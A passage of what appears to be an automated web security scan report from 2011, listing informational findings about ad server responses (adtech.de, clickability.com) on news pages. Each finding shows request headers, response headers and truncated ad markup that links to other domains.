rsiPus_oJ6I="MLsXrqEO5ihr4JB0esFCP3iTwKJkgx2gQRTIgLpbO5bzUKo5agSRamM8BUBiXf5iQVJE/qvOLDxrtPlWva+WFfRLnrsgVEgRJznRYvE/JCbIJlFRZ0v8lk2FMP7VgY0aDJ1uvr3sxbowAuFyRMBuLfYcr6fFEv89nuq04UGKmDchPxvf1VTgDWJTEx5Kkr8jzQunm+6oPneCoGtSQhyGHZzxdfyY9pzlPM/onuX9X2JdmNFRliGjpOxxE+0pD+DBZZWgpAquHQkJ1YB5V5px1bD3K+pKttxiYRyYsLRuin4AdpE+D57tHyWhDKXYnaxmhDlbT40RVZTlQWa5SHr/yRW15cgoL2BTNz4ZHIOIbZ3w+GOVtetiHdAwjqA5Ui4WrA6bK25LLI4Ir9sIh2o24VUvkbMIaqCDNsF2jNanIWOT86v7ILEO8GTv7ysgdBPV7GNAhaATIC6+9HWKklodYgNie3KEsyxp4Ip53yIQktBt7x0rOG5/65JnmRP6pZbn0beJZ9e2WzN097dXeixXnHdq6JFVAyAbmpVkkwNOY+wWd6dg4Jf/QXM8CJVkFVKLOlMwzlBml/4yW2mwTMAgsUWTbJEe3D5h5Qu+avLmgFYgCdm3afOE65XEGgbY6gQI2QyUKfE89OzxvQEeuV8Z29PLI2LFlmgFNy3CKVxZ5PwiIOfTemnz/u34vuwdvk5OwPoIKx6wc64f4XUyQCxKRAMtrDlD3lqOkddwPiQPQWSdxvqE7+8qAf4lJEA0RdLVS+EOIKQcs4IiqbmLClAFvanxVnt8+DAJ/at8TweJdiurVsUJ39ifvys0hlSV/6J8xDBFRvnTXW7RHu077j5I8EhkX0VLoUvlsoHLXJRFSkMMdD1Rjk6kj6u7MTXab7InNjSHU6mj9FV6J71+hVaENmvO6xRYxe8DwuUoxcZGfl++Mz5gpSVkriCBhEEVGAa0whhl40WBypkKGx6ytK8eGBxCHtMy7YXpAt8GVfXO2nHdDF5NRbljpX5a2idAiaY9hZRKaSwdCl0zO8qy8rZheiOX4dGOkvvILbHnPIk="; rsi_us_1000000="pUM1Iz9HMAYU1O2WQ6agQvHtomeqiTx+scbgotrS/irrnp9hR1uXbUVk0H3WxoeLl/xLNe9VpQo58/SfnwRIVPklZlA8PnoYUYWIbDUqYS9zQYnZsUoP3QRkponkl0tHHb8kkKwgkXBko7XOn1jpgcgJQ3/+sBnkvl0R76S9Yt1TpYoxEcshze8XSI9IYwGJZAQM8acKU6QFRiQuOSfWyKPrE4VIXPPwX8RUWiY/UssOCRqN2G4sqarRk4NsaJRnlj2K1Y5HUKhRsrHbW1pTdRNtT9ZKulZhziyboYdrEO2sarAl/MFVZsjwi/Wv3qLm1Fs/xHiIfiPD8ptaFv53hhEy0x9Nzgra6z5i1sNDBdwC2AMM5jmRxk1HiSJ7rc7geNXoMpcoW5lazev62kFjic7GRlCPMyreliDoEbRStv8bUX0hzqBtlrJJ71XkLAtbR3bp3YXVlT/i03+GD+X4pnqR31ooqOicd/3sY/HfyHpsfYFpK+9cKfsOK0TMqmEZgg6TVATszTa6DVBy+9HIW60cgGORBfFeA3V7ZWrc7A/f4TCz6oav7WuUpl/8FU3EZiYlcqNpGIiqu0EDyUFyBc0Mm83cLtn7n1YkzNAWKjM3BMlNOvL7luAFxGav7veb18OL8FnDLIcc98IdSjePgO4x+TnvWMc1o3LMnx7KFnEVNL/zr/l7lPtA+JVzT7cnj2wyE4QaQHKh6Ok04D+HbZpnYVGPcUhH7ir4iXn1X1fRi2WC4X27+2MYNn6XJpgOOB6hxeYRKJezFPVyYHA0E8k8Y6vPmqAzcUQ1GgmrtVMO5TynL7MxkjlDhd/qkAAADTkEWFYjM+71vkik63NbiYJzNhUruoYNDY4+Cdad8nntQwYFdaZi2z0oTqrM2W9VLHxiO/W3OZ/DoHhIVOR05q3qEJsSQqz4HlTPFqdP6tMOPEdT2mlN6I+snoH5H1+95/20PTZV63bqPslFDdpjQUzOUzlGEQz5vlwfpcobNG6ZffmcfXkVRA90ZS5vDX6RoLFO4jXs4PfHmOaxRujzc+ZZx71yBGG4cW6a3AIc/QKBNjPUub61ya2Yeam0YNeI4XUBKw1I8arhmHwBw24bTrJB78myPAavjRhXseaoyMiRz2SpgrQict90ITDGOCmvQzQHHUwrMEuS4OMOI9nlvFiigkXOsxfJqbwLbPJxK7vepa4gP5k5reKfLJLOzB1tAhyu+0M+ogOQqwjKAaQSNYVRfyphA/AzKCF02DWfoPvuUecdYTEKFjQ1VG+g3YxKNYroKXLd8VGMnDiPqMcBJGPJAP5XjR0FOhbahAhbE9hcU3YzJtc0N15WcuBwumA6aiTCtPbC5GocnaApsWij2wpzPNdaYaar/KwBLK+unvGZw9So2/L8umdKyijf1qIYR3BsN1iRRVSFtpq1rjLe/12ruK+l5hbTSkGCxSxVj27tdXKbj+wNhb0Grx0f0RVz96JdXLab+X7gER0OWV6Ub93Iau3V3nA8U2eR3eW8WCzYma60upmY8LQB1Wa9Fjetzfo="; rsi_segs_1000000=pUPF5EOhMHIMN6L9XiOlhjCqMTK6h6pMhgM0dgR2ZLwQuK591A7FUMhc07fslEjp0ID+u123pQJ2WOOcFehcGwRO3+GBodUoFsbRk/QoWYk4c6JHEfwMOMG014RVW/ae4EVImiihCtAOR7o00v1Av4W+67mjSX931yJFNEGnkXHKKGemM6oakhZYuNn++XSAaSD/KFcyeItwGqWmS5L1fWz3jOS657huku/N0SVSl2cJ3lUp4mzf/15P/SpH3uMjdcidqoplEHbuchfD9ywF3P66kGsfxYo1mxoymsoZetPIFP0ffNDfMLjjNFIzKlvZuUgbFfaFOL6AbG7GUvAjTSSs+fN0pT1Ek1A1O3Uawg8CYDi1iW8H0kygALN2qJ+ws9ZOH3ugpCLaZ5feHz0JxquchN2/rq+HLLuOZ0VKwgyhnjOvVX8lAqNNGQnydj1ObQFnZ3eyoEiP2frlPEGSBPv7VbJ1gOdXtavZhpvWa4MynECuel295hxlggN5joS+oH68R/BvNNYxTBk/8bUbqkGRIF2YopY8aJfkRkxg7A==; rtc_Wdkl=MLvn9zU1JwprpgZts8KQPOfaDcghJRY/syRG3WmM3le4ahJ60DTLD9+eQw9TOWi3mDGoGjklUGHxoEY411AnlDFR7yxZ8S+5rurGG9f9pKwr4QIY3riFWwRW2/4Pe6fIj9pfpVEFteudvD/rxinl01fHUDRopiXl3GV8QG4osgcIGNdQx253r5pJdcwR9YNyu0DNQTJxMId3nnJVUuDBpShinKA4tGa1cJ5+Hi2h59O3EJ9kKg9GI5OyNT9anWrXE6ywNFSU8AW4cLbauLlR5eS2CLmnPIYYHKESl6oWWm0MTZXo6HvTRjOh3Kxjjr71vvRTm7L5Tz/0AbnlXpfN5o3CS5RjdMCB3pJQ2xQbBI3eRje/yubp9KxdtHOub8fTM28fZtJ4Ff2evOSytK6+rguHT8qBsX3nAF+4suLuuzKXbljxXplpid99mfevz1NlGM1rlme7TFJHFw4T1WuGDkF0/Bw+17f4hzOZ89iGWZOwrinriMKVgfY7jgoThgi2LCqlToo4fv3BlxJBfv516scfvSGQii09J+OKaow2IMFHec2le5u592GGLOoNfhzh0wpAqny0dXMRunGZyuZpmgLUxyUcKEwjHtT4X/AWCCCKORS/JMUrvxw3RAPJ6tF7CPQVmN7vqfcMGol2PIwqma6LxPH616WqLSzSnYgrsHT0TROIWZVFqnuaJM072T0MT5VgEjbfrOrd4LflERbjcTxSI2oeuTXiK4/DDbsMpXxVYN1Y2+usrIA2tC4YKZcBieXRepuUWczdfoZq+FnW2fy54+8Ahj2DVr9lOeaPFz2YdxRA1DSkZ4p5j9nptFqVYRp7FQzd3L/rYbDcNwxsgNzSO1d/3MsEpZ+u6l/tYp6235d2EPF1lJvs+eY9ItWr2vywljErTzIjlFHOn3/vKN1lEO73a0MbZqAdadvoFSbLJ0FvE19rnlZr+jLJUArQXcyjG6qIfxe/x1qg9xSiD31RT940BPPNPFuSB3jU1xCgzxdwZN+cLq4+t59GjXdlNZMYlZEgjb2U0xa8rhgytOKQKj8cmLxuSqaEZ+rWPzIohHg8f7s/uwKkvXH7iStjrfLqN0iCTEktKJXa/EwxS3z/MCvPn1r/idkifyjhHKEVC9C8zVl28Q/obJ7v8A4+p79u6ECvoWawsZnxyX2Sk6D9FNVYNlOJvedTMFsJwjXTr5IfjCyqZk/UBqwFopBNsF8mpjRgy0jItxUL6s4Q7hJdKlt00izGkWFGjIaDJ5kgZqTbls7bo0uCnBhS0EivUGf5It9R036YZRZQhxLAMohm4BfvheaScBd0B6LD+dTsBOvBZt9qi8tKiSbAaWZAZG0kSm+xaQ8kjECVabgciinTfHRfdpcUgspdFtG/gYEj/BGsLUEDEDI7RiOCgIHqoGp9U8cm+NPOB87TWiP0V9cm6dG/MoQEGnmIEcpVMkMbUqQQPupK8MsZQ14dKvTqSRi8zQdNUKGRl/VBOD0x4AipEdvfcRFT77t0mzC0MtmgixiyT97l2MWc7nrXw+dbSqjkDo/V3VevRKGZiARbawBaubiTK1iTZ5X/QPG06n9m/GdUjFWTiJTeUtEsWyR/00AFRQ1ar060riKgW0WNe5vm1v/hmD2/AqXENoELyR0vXiP4im0//qAix0JrmEcuVRVnuzsHTORwkiEWyF8n88lfFjkZL4mXL6Ur0sWd4e2vaJRwp8A=; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4decdd55&1&10011&4dc75936&271d956a153787d6fee9112e9c6a9326; udm_0=MLv39SEpbjpv597JcdnUBu4MHEenRCd8VPQOZXj35OaFc5qnI8MKCuGnn1SBN3Wnlqzb1/yfNaxCbp9btShq6NvtHJWkO5yz1lh5l92l+unpO8a62HEC0Ow3WsLVWsQO/LH6+aoOEKzXH626/J57yCfXh/SJ94hwXC0dfP558ntGi+TU3NFRXHYa8+u6SoZXLSsbbKVaGlLBJWNm8hDUZzQqCt6nJiWA5uBufndLwp+daMTDTfyoG0u88UrfSLKLtUwmK9Nc4+z6EEtp+jVizB4mNweBK4+LPHOgz7mIIN1zEXOuNDS2M3fG45TcRhoFUg7VUoH4CrMwF5Hpm1b9QGhYTjezLcjOEtLIYizka+GxtFQp+VpovDwshk/5DWsqucfelZBHOq6PNkU4W0j0xbqkwPek+ROrQddfTZv1pNfgRSYxFVvPYmCb4nrJkE6/Peg3SlGFEn9/rySzxBikRJmE3/M+lcGEQtcTVk6XNz4n/DcRuhSFd65APv6NbKeC0HI6lNEUNzL+w64Hg+pG4olOwauUJwKqznmt+LB5rRjeluO8lSlvSBWQGVjhFm+gIpo9t+Yxqi4Z6uY0wSPgV8rTfN48XfW9RTj7ci2zEgmrOn1sN6QxSV7zb2x9cF1Mg+BA9sVQEMOsTWxmc+20Gr2V6H9VMFkU2ChzWlllS1boIRa3E/f1sBgqwD6TvxrYAvRkVVeal/ThwkU0nX8scPQiZzAqIs3IeNjBUiNOMadIxaU9pT5zdkTfaCQLjbTqbQPN35UFLAQBoj8ANYBC749UUW3BXFOcvPiv+T4YmYn9O9+lruitAIYyG9TQLPJnVSINqWfDptNc1BkY+p2mgA00NHBRERyw0E6NiPaBaltF6a56LYEXqfbbF/Gu4Wf77t5UCPm1daS12CqLzhf91ykW8SLmb14HhEZ6jZGGvdPljDhV/m9VoiyOCYbeLW/aUAcz5LJUBeoWHNBb7NaLvlgsIj4LI51awNXjRD4dphanGc82HIPY364YbduxCjYn3qTfpSrm/exLtSUxnAbQn4cG/qOec4i7XuuCoaWMrKMGX/I+uCJ2q7C2N0bVCkMZBSEVEEshLUVLQ9TcCpEo72HPSAWY9AgCPz+RdghUBRpyOB9CmRHKmYe5kupGqYYAY8zLxVOdDQPO95g4jYDw856TtCNHODN+d10UHIyZRtWfFpavvlcymO88CcT4BmFmzBVeXmO4ypieT8f+T0bRs6sbp6oxezSidqCe+kgT1niBnV6hwEbiOULFjWaip799DGaPudLBvACvunnTH8sAt5jLFhSMvJ4EzaFro1t7dUzN7znrBxyRg94NxPi8SY5T4sRRXw==

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/adserver
Set-Cookie: rsi_us_1000000=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_oJ6I=""; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsiPus_D-6M="MLsXsqMOJjhv5pB0GuK8L0HP6TxvTJOb5RPKlFjm2oawXHqkUpttbu+TpTQ7/r5k2TkfGHxsBiWalfeAB/i2ZeDVh3sNrEwwJAMx4il/KokORw7o/SdsY9rD5Rran1cYTu5H2glQ6wiGGbe7BONawjupeQmuCxD6wLXUENGDz17XkpjDubHWNj6MzdO20TKeo2ebTm+X/aIFIAjSHwRm25h7faDJboBly37SaRVTJmVSVncsdODBYijyuPYTdFwC03sgxGgMINUQBU941lqVIMhGuSaJnSZ1bjvqoCCRDLRyqJCi6WnVSUpydvqvGWVlBYhxf+2EJFBlcMlHTpZKXGT1HeSqJJiOoXZpr/uvbpKdN1F5nqoIZKyR9HZy2TbKbYnBNFxzgutHbw6zXXppgfBJaWgOtCOMhs/ZZJ3OA1pxSjhPMmisV+EotP7wA2c0D7Io2lBYNXPe+9NRjvYmJrWaYkh2V9cxr+G5/xpyO81WenMWdhNnGRMtQomwCOTzjyZJYxNaLgOUEIIKY/A87ufnJ5qjqqB+BP8joxvEdW3W1Npu2B+Na3ecvL1Hhc5ZC1GBTQF0B1zfcmgxi8UCiZBmR2u4TvNpihWJeHOeADYhYgHy7fOE602RwkvfJpCdu7CgEkl/EapX90ymBIYIqwTRnrIV8fRqLA/JDPUN6wj4Po1l5cmK4VoP0sL52LnFEkGOXjlWFKb/dz4QQVlB3RU1uDB5Q2eyVzyWDhLN6+otEMWxip/DPpeVZFX20gRQOs9ik/EEMEZ5SBlEKXm9E12aY3Lb8xP23GKX6t28Fv8oVf0A9Hzq3RgaRIvYuSeHKg9n7kgHYmsqEC5FNeGc7ov2Rk7IAiVAilbtLgqkH3JaN/btEetkR3e86wQSucxk5aStmOWDZrorIifNpOczosSxBSP3da2SvQWkfJfNRVfxtlhd7qB8LBiXDl2SUm9TMHyJ+KLZ20a5mxC8xN7Om6Kt5yd5T28UAIR5tZznNV/NkyVtt/ytpEiB8NmrJm1LxAnC+RcrDEAr8/agqLZBIx3GTt7wIpqdhFr58Dzg"; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Set-Cookie: rsi_us_1000000="pUN9Iz9DOAYU1O2uA3Nf1wgg9Tpj7P8STnjz/8LS/qprmdrNu/Wv+Yp2mpP2gxUFQc/rlHGwyyG/2blenQfG1l0Q/iLSgjgPy6DOmNB2RidToi9fOv5uXgl8+4W0L5YmY28pH9JqakD06xSknvL5GRJuLPqNluHWRddDf63qduJIoP35MjeUiF+saJEMy/UOMsbiRDD+AqcM3wOeIhml4rFWgSAbj5SiITj5PrU4NK/fHsY65IwlXPMI/pKzvuGuzGzhzcEk1KynD5qCt8jOSkM2oAlc0wx6QlyPfCUZPATyRdNFhEM5y9lsLQ0p8cg4khQHQccUe1bCkkhdhyNLjcJh4RhXA7qtoRmA/3jVPEVUy61DKwIuJLIHRusqJVlbHTumZDnWUlnilqW9jrYlGM4+dhWXAfb4gtdKaz0GKHus33rMTSxatHCCitc45ODJwXHyOzv/BcA6smRRrYOTGGrag2N6reait+mxyihdCmQBnnZYh2AjQyI1DujvXsL5ZBYLhfsRYs+tan3tzYKttQmkwnqlQ4vHKqg6BIgbUvya8t7FHWwzO3V3Q3AcEP9oXSVv6oMtWTCV98nh0Alk8ravDhoJbJkk3NhdxtyWNrFELGmL/PNXc1h9zBAY9vEeNFGRkVf2u+Mui0cz5sNGO8Uzy5sT+eHKqO0Lmtn0vA7CspugEbQv/vdjaBRqge2SjgrxVqGBFx82gTqIDlHt06oiisS2tQF5pRZbQrxnMZ5to24HAkZhEcKgWJOBJJBtJr5X5kUPq6xZgyzowadexRLuAcwobZ0FFCxzxOyiPmeJMgbKV8+BMRRwQl7ZZTczcD92zqidoBQxGLupenkFRWHHCzlhmwYSyRBPqEdgyW4BPKRdwlJ3PZul3jLx1PtQ4NRdGHd5YH1BsN0KCa9yZCW9yODwolH/aBISyjfq0mg+ILAD634YEvdwzGwHe6n0NZxKYYZCDhUuKwz9gCXdEuFItH0gBJApTVgbxbVJBw9SYPnDTm20ZnCUGnXDMGOeRjFFIE9e7Z+UWuTTsnHpU0l5prxyTXe7oRSxpEBEk/ZqjaXH2B+6cd+R0f/jFy2EMYm6+pJDwthlUTpRDB0YZ0iUsB/sp3GzuDrmZKUmBcxvnrxfYDmLFGZpcsmlejWoWCCK1ygwfY0CDcigYCPasCONAsMXSSO2PlVZ3X9r+WNc9ZxAhE3kS3bni2yb64gi/FusJre1KWVPFoYCnANej9xGlU/w37shrHplGwwi2CmPIhr8ESop1mEX0CN9mqRhC5UV+837fNG18SC3vWzvuax0/sY9ZAK+vVhycciXqeVl6l2aRvZs5QBtWoIyaTCIIPUqsvFmBAGDmJ+zmYerK9EBYZJt7pp+wasNsfeq8+lJLwmmQvtWOLtWraxYr8ZZ24/BijoxGDUTdTpDpeeWDA6VmccDk+Ah9R/lF9IXZWDidngc8JPc3C7ITqz4YFQjkYRQ+lKF7SX8xQ=="; Version=1; Domain=.revsci.net; Max-Age=1009152000; Path=/
Content-Type: application/x-javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:29 GMT
Content-Length: 1582

document.write('<script src="http://ad.yieldmanager.com/imp?Z=728x90&s=1806342&r=1&_salt=2127245864&u=http%3A%2F%2Fwww.floridatoday.com%2Farticle%2F20110508%2FNEWS01%2F105080319%2FHighly-publicized-murder-Caylee-Anthony-rivets-enrages"><'+'/script>
...[SNIP]...
15.12. http://adserver.adtech.de/addyn%7C3.0%7C826.1%7C2874578%7C0%7C2530%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C826.1%7C2874578%7C0%7C2530%7CADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C826.1%7C2874578%7C0%7C2530%7CADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=714;misc=1304949656864 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 499

document.write('<a href="http://adserver.adtech.de/?adlink|826|2874578|0|2530|AdId=6218236;BnId=1;itime=949673789;key=key1+key2+key3+key4;" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/508/Ad6218236St1Sz2530Sq100310965V0Id1.jpg" border=0 alt="Click here!" width="219" height="90"></a>
...[SNIP]...
15.13. http://adserver.adtech.de/addyn%7C3.0%7C826.1%7C2874579%7C0%7C225%7CADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /addyn%7C3.0%7C826.1%7C2874579%7C0%7C225%7CADTECH

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /addyn%7C3.0%7C826.1%7C2874579%7C0%7C225%7CADTECH;cookie=info;loc=100;target=_blank;key=key1+key2+key3+key4;grp=714;misc=1304949656462 HTTP/1.1
Host: adserver.adtech.de
Proxy-Connection: keep-alive
Referer: http://www.irishtimes.com/newspaper/theticket/2011/0506/1224296203710.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JEB2=4DB3681C6E651A440C6EAF39F00FE389

Response

HTTP/1.0 200 OK
Connection: close
Server: Adtech Adserver
Cache-Control: no-cache
Content-Type: application/x-javascript
Content-Length: 496

document.write('<a href="http://adserver.adtech.de/?adlink|826|2874579|0|225|AdId=6346446;BnId=1;itime=949671473;key=key1+key2+key3+key4;" target=_blank><img src="http://aka-cdn-ns.adtech.de/images/206/Ad6346446St1Sz225Sq100487590V0Id1.gif" border=0 alt="Click here!" width="728" height="90"></a>
...[SNIP]...
15.14. http://cas.clickability.com/cas/cas.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cas/cas.js?r=0.3227309067733586&p=1426&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27ad_05%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:11 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 1182
X-Server-Name: dv-c1-r2-u7-b1
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27ad_05\x27\x20class\x3D\x27callout\x27\x3E');document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="125" height="125">');
document.write('<param name="movie" value="http://media.indianasnewscenter.com/casflash/125x125MayJune.swf?clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D404124%26n%3D225569%26d%3D654194%26
...[SNIP]...
<param name="bgcolor" value="#ffffff" />');
document.write('<embed src="http://media.indianasnewscenter.com/casflash/125x125MayJune.swf?c=y&clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D404124%26n%3D225569%26d%3D654194%26c%3D3031" quality="high" wmode="transparent" width="125" height="125" name="ad_05_Parkview_May_June" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
document.write('</object>
...[SNIP]...
15.15. http://cas.clickability.com/cas/cas.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cas/cas.js?r=0.47879663039930165&p=351&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27headerpromo%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:06 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 459
X-Server-Name: dv-c1-r2-u7-b1
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27headerpromo\x27\x20class\x3D\x27callout\x27\x3E'); document.write('<a href="http://cas.clickability.com/cac?a=390604&n=218584&d=654194&c=3031" target="_top" id="cmSK-placement-351" cmSKpID="351" cmSKcID="218584" cmSKaID="390604"><img src="http://media.indianasnewscenter.com/casimages/232x90HalfPrice1.jpg" border="0" height="90" width="232" alt="Half Price Deals on Fort Wayne!"/></a>
...[SNIP]...
15.16. http://cas.clickability.com/cas/cas.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cas/cas.js?r=0.7541181682609022&p=1461&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27ad_12%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:08 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 1185
X-Server-Name: dv-c1-r2-u7-b1
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27ad_12\x27\x20class\x3D\x27callout\x27\x3E');document.write('<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" width="300" height="250">');
document.write('<param name="movie" value="http://media.indianasnewscenter.com/casflash/luth_sleep_ad_inc.swf?clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D402659%26n%3D224819%26d%3D654194
...[SNIP]...
<param name="bgcolor" value="#ffffff" />');
document.write('<embed src="http://media.indianasnewscenter.com/casflash/luth_sleep_ad_inc.swf?c=y&clickTAG=http%3A%2F%2Fcas.clickability.com%2Fcac%3Fa%3D402659%26n%3D224819%26d%3D654194%26c%3D3031" quality="high" wmode="transparent" width="300" height="250" name="ad_12_LHN_Sleep_4.25" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer" />');
document.write('</object>
...[SNIP]...
15.17. http://cas.clickability.com/cas/cas.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /cas/cas.js?r=0.845637274440378&p=1421&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27ad_04%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:10 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Content-Length: 419
X-Server-Name: dv-c1-r1-u7-b2
Connection: close
Content-Type: text/javascript;charset=ISO-8859-1
X-Pad: avoid browser bug

document.write('\x3Cdiv\x20id\x3D\x27ad_04\x27\x20class\x3D\x27callout\x27\x3E'); document.write('<a href="http://cas.clickability.com/cac?a=398234&n=222839&d=654194&c=3031" target="_blank" id="cmSK-placement-1421" cmSKpID="1421" cmSKcID="222839" cmSKaID="398234"><img src="http://media.indianasnewscenter.com/casimages/DaVita125x125r.jpg" border="0" height="125" width="125" /></a>
...[SNIP]...
15.18. http://cas.clickability.com/cas/cas.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /cas/cas.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /cas/cas.js?r=0.998735488159582&p=1436&c=3031&m=11854&d=654194&pre=%3Cdiv+id%3D%27ad_07%27+class%3D%27callout%27%3E&post=%3C%2Fdiv%3E HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
